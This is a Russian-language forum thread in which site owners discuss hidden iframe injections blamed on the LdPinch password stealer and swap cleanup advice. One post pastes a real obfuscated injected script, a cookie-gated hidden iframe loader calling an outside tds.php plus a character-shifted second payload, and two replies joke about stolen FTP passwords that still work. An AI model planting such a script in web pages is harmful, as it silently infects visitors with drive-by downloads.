Web-вирусы. iframe

Статус
В этой теме нельзя размещать новые ответы.
Юзайте Линукс и проблем станет знаааааачительно меньше :)
 
это все проделки вируса LdPinch! причем хорошо шифруеться и не всегда видин антивирусами. особенно в этом деле плохо показал себя nod32..
Вирус ворует из многих известных фтп клиентов пароли и потом в атоматическом режиме добавляет на ваши страницы зловредный код с фреймом.
Лучше всего не сохраняйте пароли на автомате! хотя бы банальное сохранение в txt файл и то больше гарантий даст чем сохранение в фтп..
 
сорри, если не в тему...
тоже обнаружил на своих сайтах инородный код. 3 сайта - joomla - туча индексных файлов. Хостер (свеб) не парится - говорит, удаляй в ручную.
Качал файлы к себе на комп, думал дримвиром отредактировать, но тут антивирус (nod) перехватывает - и сам не лечит, и мне не даёт редактировать.
Может есть какой скрипт, что бы на автомате на серваке с файлов удалить код ?
 
Чтобы автоматом исправил текст на серверах нужно написать скрипт который находит и меняет в файлах определенный текст (HTML код вируса) на другой текст (к примеру на пробел), попробуй поискать подобные скрипты либо же напиши их сам.

То что NOD орет на файл это понятно, хотя нечего страшного еслы в текстовом редакторе откроете не будет.
Советую:
1. Закачайте файлы на комп.
2. Выйдите из и-нета (для большей надежности)
3. Выключите NOD (чтобы не мешал удалять вирус).
4. Открывайте зараженные файлы notepad' ом и удалите строки вируса, обычно они находяться в самом внизу, там должно быть что типа <iframe=ссылка > удалите подозрительную запись и можете заливать файл обратно на хостинг.
 
lift, злой ты )))))
Бедное блондинко из красногорска :D
 
Jeurey
Выбрал отчет чисто методом тыка пальцам :) про блодинку сам смеялся ибо отчет ноябрьский а все пасы рабочие :)
 
<script>if(document.cookie.indexOf('tnd=on')==-1){expires=new Date();expires.setTime(expires.getTime()+86400000) ;document.cookie='tnd='+escape('on')+'; expires='+expires.toGMTString()+'; path=/';status=location;document.write(unescape('%3c%69% 66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f %2f%75%70%64%61%74%65%7a%2e%69%6e%66%6f%2f%65%74%6 3%2f%74%64%73%2e%70%68%70%22%20%77%69%64%74%68%3d% 30%20%68%65%69%67%68%74%3d%30%20%66%72%61%6d%65%62 %6f%72%64%65%72%3d%30%20%6f%6e%4c%6f%61%64%3d%22%7 3%74%61%74%75%73%3d%64%65%66%61%75%6c%74%53%74%61% 74%75%73%3b%22%3e%3c%2f%69%66%72%61%6d%65%3e'));}</script><script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74& 86&7e&76&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f &78&3f&77&83&7g&7e&54&79&72&83&54&7g&75&76&39&47&4 1&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d& 42&42&43&3d&42&42&47&3d&47&43&3d&44&43&3d&42&42&49 &3d&4:&48&3d&42&42&45&3d&44&43&3d&49&44&3d&42&42&4 7&3d&42&42&45&3d&47&42&3d&44&45&3d&44&4:&3d&44&43& 3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d &42&41&45&3d&42&42&47&3d&47&42&3d&44&4:&3d&45&4:&3 d&44&4:&3d&44&43&3d&42&42&46&3d&42&42&47&3d&42&43& 42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&4:&3d&42 &42&49&3d&42&41&46&3d&42&42&46&3d&42&41&46&3d&4:&4 9&3d&42&41&46&3d&42&41&49&3d&42&41&46&3d&42&42&47& 3d&42&43&42&3d&46&49&3d&44&43&3d&42&41&45&3d&42&41 &46&3d&42&41&41&3d&42&41&41&3d&42&41&42&3d&42&42&4 1&3d&46&4:&3d&44&4:&3d&47&43&3d&47&41&3d&45&48&3d& 42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41 &4:&3d&42&41&42&3d&47&43&3d&44&43&3d&44&43&3d&47&4 1&3d&42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d& 42&41&4:&3d&42&41&42&3d&44&43&3d&42&42&46&3d&42&42 &45&3d&4:&4:&3d&47&42&3d&44&4:&3d&42&41&45&3d&42&4 2&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d& 45&48&3d&42&42&46&3d&42&42&42&3d&4:&4:&3d&42&41&48 &3d&42&42&46&3d&46&43&3d&45&46&3d&46&44&3d&45&47&3 d&4:&49&3d&42&41&46&3d&42&43&43&3d&45&48&3d&42&41& 46&3d&42&42&41&3d&42&41&41&3d&42&41&42&3d&42&43&41 &3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&4 4&4:&3d&44&43&3d&42&42&4:&3d&42&41&46&3d&42&41&41& 3d&42&42&47&3d&42&41&45&3d&47&42&3d&44&4:&3d&45&4: &3d&44&45&3d&42&44&3d&42&41&3d&42&41&41&3d&42&42&4 2&3d&4:&4:&3d&42&42&48&3d&42&41&4:&3d&42&41&42&3d& 42&42&41&3d&42&42&47&3d&45&47&3d&42&42&4:&3d&42&42 &45&3d&42&41&46&3d&42&42&47&3d&42&41&42&3d&45&41&3 d&49&44&3d&42&42&47&3d&42&42&45&3d&45&47&3d&42&42& 46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3d &42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d&4 5&41&3d&46&44&3d&46&41&3d&45&45&3d&45&4:&3d&45&49& 3d&46&44&3d&45&42&3d&45&45&3d&49&44&3d&42&42&47&3d &42&42&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&4 9&3d&42&42&46&3d&42&42&47&3d&42&42&45&3d&42&41&46& 3d&42&42&41&3d&42&41&44&3d&45&41&3d&45&49&3d&45&45 &3d&46&44&3d&46&41&3d&45&42&3d&45&42&3d&44&43&3d&4 7&41&3d&45&48&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d& 42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:&3:&4c &4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>

подскажите начинающему как это можно дешифровать в удобочитаемые комманды?
Спасибо.
 
bbs
Как тебе на такой вопрос ответить? Это все кодиться начиная от обычного base64 и аканчивая приватными крипторами. Тут можно гадать долго. Только смысла нет всеравно. Зачем тебе знать чистый код инфрейма если результат и так понятен: подгруз на твой комп файла.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху